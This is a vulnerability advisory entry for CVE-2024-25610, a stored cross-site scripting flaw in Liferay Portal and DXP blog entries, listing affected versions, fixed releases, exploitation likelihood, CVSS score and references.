CVE-2024-25610 — Liferay Portal has a Stored XSS with Blog entries (Insecure defaults)

Description

In Liferay Portal 7.2.0 through 7.4.3.12, and older unsupported versions, and Liferay DXP 7.4 before update 9, 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions, the default configuration does not sanitize blog entries of JavaScript, which allows remote authenticated users to inject arbitrary web script or HTML (XSS) via a crafted payload injected into a blog entry’s content text field.

How to fix CVE-2024-25610

To remediate CVE-2024-25610, upgrade the affected package to a fixed version below.

—upgrade to 5.0.96 or later
—upgrade to 7.4.13.u9 or later
—upgrade to 7.4.3.13 or later

Is CVE-2024-25610 being exploited?

Low — EPSS is 0.1%, meaning exploitation activity has not been observed at scale.

Affected packages (3)

from 0, < 5.0.96
>= 7.4.0, < 7.4.13.u9
from 0, < 7.4.3.13

CVSS scores

Source	Version	Severity	Vector
osv	CVSS 3.1	CRITICAL9.0	CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

References (3)

ADVISORYnvd.nist.gov/vuln/detail/CVE-2024-25610
PATCHgithub.com/liferay/liferay-portal
WEBliferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25610